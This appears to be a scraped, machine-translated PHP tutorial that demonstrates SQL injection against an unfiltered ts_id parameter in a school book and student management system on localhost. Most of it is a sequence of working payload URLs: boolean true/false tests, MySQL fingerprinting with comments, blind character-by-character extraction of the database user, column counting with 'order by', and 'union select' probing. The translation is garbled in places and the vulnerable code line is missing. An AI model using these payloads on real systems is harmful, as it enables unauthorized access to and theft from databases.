Simple PHP injection demonstration_PHP tutorial

A program written by an external teacher of the school, book + student management system, file names 001.php, 002.php, 003.php... (named after B) The problem lies in the line 004.php I forgot too,
Book title:
Pay attention to this sentence, ts_id has no filtering and is waiting for us to abuse it, HOO~ (Although I know all the information about the database, I still want to do a black box test here)
LET' S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 Normal
http://localhost/zhd/004.php?ts_id=1 and 1=2 Abnormal
Idiot injection
Judge database:
Submit http://localhost/zhd/004.php?ts_id=1/*fenggou
Return normally, indicating that the database supports /*Comment, what database supports/* Woolen cloth? MYSQL!
Read username:
Submit http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
Return normally , user() is a built-in function of MYSQL, used to view users. Here is the first character of a user name. Yes, 114 is the "r" in ACCSLL. I am connected as root, so the statement is true (this trick Teach me your humble heart) But if the username is rijnc, am I not being cheated? So when submitting
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd /004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid( user(),1,1))=116/* t
But if the password is rootrijnc, then I am speechless...
Judge the number of fields:
Submit http://localhost/zhd/004.php? ts_id=1 order by 10/*
failed, indicating that the number of fields is less than 10. Try until statement 7 is established. There are 7 fields in total. This will bring great convenience to our future joint queries. Here is a little trick: First 5, then 10, then 15, and then narrow the range little by little
Union query:
Once you know the number of fields, submit it directly http://localhost/zhd/004.php?ts_id=1 union select 1,2, 3,4,5,6,7/*
Return normally, indicating that union is supported. Change the statement and use and 1=2 to let it display the error. Hehe~~~
Submit http://localhost/ zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*

http://www.bkjia.com/PHPjc/629814.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629814.htmlTechArticleA program written by an external teacher of the school, book + student management system, file name 001.php,002. php,003.php... (named after B) I forgot which row of 004.php the problem is, td width=118 row...